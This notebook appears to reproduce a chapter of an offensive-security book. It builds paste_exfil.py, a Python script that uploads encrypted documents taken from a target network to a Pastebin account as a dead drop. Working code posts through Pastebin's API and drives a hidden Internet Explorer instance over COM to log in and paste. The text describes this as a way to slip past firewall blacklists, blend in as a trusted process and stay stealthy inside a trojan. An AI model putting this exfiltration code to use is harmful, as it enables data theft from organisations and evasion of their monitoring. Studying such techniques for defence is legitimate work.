<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C9-Fun_With_Exfiltration/Exfiltration_Via_A_Web_Server.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Exfiltration via a Web Server__*

Next, we'll write a new file, __paste_exfil.py__, to send our encrypted information by posting to a web server. We'll automate the process of posting the encrypted document to an account on https://pastebin.com/. This will enable us to dead-drop the document and retrieve it when we want to without any-one else being able to decrypt it. By using a well-known site like __Pastebin__, we should also be able to bypass any blacklisting that a firewall or proxy may have, which might otherwise prevent us from just sending the document to an IP address or web server that we control. Let's start by putting some supporting functions into our exfiltration scirpt. Open up __paste_exfil.py__ and enter the following code:

In [ ]:
from win32com import client #[1]

import os
import random
import requests #[2]
import time

username = 'tim' #[3]
password = 'seKret'
api_dev_key = 'cd3xxx001xxxx02'

We import __requests__ to handle the platform-independent function __[2]__, and we'll use __win32com__'s client class for the Windows-specific function __[1]__. We'll authenticate to the https://pastebin.com/ web server and upload the encrypted string. In order to authenticate, we define the __username__ and __password__ and the __api_dev_key__ __[3]__.

Now that we've defined our imports and settings, let's write the platform-independent function __plain_paste__:

In [ ]:
def plain_paste(title, contents): #[1]
    login_url = 'https://pastebin.com/api/api_login.php'
    login_data = { #[2]
        'api_dev_key': api_dev_key,
        'api_user_name': username,
        'api_user_password': password,
    }
    r = requests.post(login_url, data=login_data)
    api_user_key = r.text #[3]

    paste_url = 'https://pastebin.com/api/api_post.php' #[4]
    paste_data = {
        'api_paste_name': title,
        'api_paste_code': contents.decode(),
        'api_dev_key': api_dev_key,
        'api_user_key': api_user_key,
        'api_option': 'paste',
        'api_paste_private': 0,
    }
    r = requests.post(paste_url, data=paste_data) #[5]
    print(r.status_code)
    print(r.text)

Like the preceding email functions, the __plain_paste__ function receives the filename for a title and encrypted contents as arguments __[1]__. You need to make two requests in order to create the paste under your own username. First, make a post to the __login API__, specifying your __username__, __api_dev_key__, and __password__ __[2]__. The response from that post is your __api_user_key__. That bit of data is what you need to create a pastte under your own username __[3]__. The second request is to the __post API__ __[4]__. Send it the name of your paste (the filename is our title) and the contents, along with your __user__ and __dev API__ keys __[5]__. When the function completes, you should be able to log in to your account on https://pastebin.com/ and see your encrypted contents, You can download the paste from your dashboard in order to decrypt.

Next, we'll write the Windows-specific technique to perform the paste using Internet Explorer. Internet Explorer, you say? Even though other browsers, like Google Chrome, Microsoft Edge, and Mozilla Firefox are more popular these days, many corporate environments still use Internet Explorer as their default browser. And of course, for many Windows versions, you can't remove Internet Explorer from a Windows system; so this technique should almost always be available to your Windows trojan.
Let's see how we can exploit Internet Explorer to help exfiltrate information from a target network. A fellow Canadian security researcher, Karim Nathoo, pointed our that Internet Explorer COM automation has the wonderful benefit of using the __Iexplore.exe__ process, which is typically trusted and whitelisted, to exfiltrate information out of a network.

Let's get started by writing a couple of helper functions:

In [ ]:
def wait_for_browser(browser): #[1]
    while browser.ReadyState != 4 and browser.ReadyState != 'complete':
        time.sleep(0.1)

def random_sleep(): #[2]
    time.sleep(random.randint(5,10))

The first of these functions, __wait_for_browser__, ensures that the browser has finished its events __[1]__, while the second function, __random_sleep__ __[2]__, makes the browser act in a somewhat random manner so it doesn't look like programmed behavior. It sleeps for a random period of time; this is designed to allow the browser to execute tasks that might not register events with the Document Object Model (__DOM__) to signal that they are complete. It also makes the browser appear to be a bit more human.

Now that we have these helper functions, let's add the logic to deal with logging in and navigating the Pastebin dashboard. Unfortunately, there is no quick and easy way of finding UI elements on the web (the authors simply spent 30 minutes using Firefox and its developer tools to inspect each HTML element that we needed to interact with). If you wish to use a different service, then you, too, will have to figure out the precise timing, DOM interactions, and HTML elements that are required; luckily, Python makes the automation piece very easy. Let's add some more code:

In [ ]:
def login(ie):
    full_doc = ie.Document.all #[1]
    for elem in full_doc:
        if elem.id == 'loginform-username': #[2]
            elem.setAttribute('value', username)
        elif elem.id == 'loginform-password':
            elem.setAttribute('value', password)

    random_sleep()
    if ie.Document.forms[0].id == 'w0':
        ie.document.forms[0].submit()
    wait_for_browser(ie)

The __login__ function begins by retrieving all elements in the DOM __[1]__. It looks for the username and password fields __[2]__ and sets them to the credentials we provide (don't forget to sign up for an account). After this code executes, you should be logged in to the Pastebin dashboard and ready to paste some information. Let's add that code now:

In [ ]:
def submit(ie, title, contents):
    full_doc = ie.Document.all
    for elem in full_doc:
        if elem.id == 'postform-name':
            elem.setAttribute('value', title)
        elif elem.id == 'postform-text':
            elem.setAttribute('value', contents)

    if ie.Document.forms[0].id == 'w0':
        ie.document.forms[0].submit()
    random_sleep()
    wait_for_browser(ie)

None of this code should look very new at this point. We're simply hunting though the DOM to find where to post the title and body of the blog posting. The __submit__ function receives an instance of the browser, as well as the filename and encrypted file contents to post.

Now that we can log in and post to Pastebin, let's put the finishing touches in place for our script:

In [ ]:
def ie_paste(title, contents):
    ie = client.Dispatch('InternetExplorer.Application') #[1]
    ie.Visible = 1 #[2]

    ie.Navigate('https://pastebin.com/login')
    wait_for_browser(ie)
    login(ie)

    ie.Navigate('https://pastebin.com/')
    wait_for_browser(ie)
    submit(ie, title, contents.decode())

    ie.Quit() #[3]

if __name__ == '__main__':
    ie_paste('title', 'contents')

The __ie_paste__ function is what we'll call for every document we want to store on Pastebin. It first creates a new instance of the Internet Explorer COM object __[1]__. The neat thing is that you can set the process to be visible or not __[2]__. For debugging, leave it set to __1__, but for maximum stealth, you definitely want to set it to __0__. This is really useful if, for example, your trojan detects other activity going on; in that case, you can start exfiltrating documents, which might help to further blend in your activities with those of the user. After we call all of our helper functions, we simply kill our Internet Explorer instance __[3]__ and return.